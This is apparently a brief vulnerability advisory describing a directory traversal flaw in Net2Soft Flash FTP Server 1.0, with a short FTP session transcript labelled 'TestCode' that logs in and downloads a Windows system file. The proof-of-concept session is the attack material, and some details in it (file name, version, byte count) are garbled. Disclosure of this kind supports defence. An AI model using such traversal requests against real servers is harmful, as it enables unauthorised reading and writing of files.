Directory traversal vulnerability in Net2Soft Flash FTP Server 1.0 allows remote malicious users to read and create arbitrary files via a /.. (slash dot dot).
TestCode:
C:\>ftp localhost
Connected to server
220 Flash FTP Server v21 ready
User (server:(none)): CoolICE
331 Password required for CoolICE
Password:
230 User CoolICE logged in
ftp> get /winnt/systemini
200 Port command successful
150 Opening data connection for /winnt/systemini
226 File sent ok
ftp: 227 bytes received in 001Se ...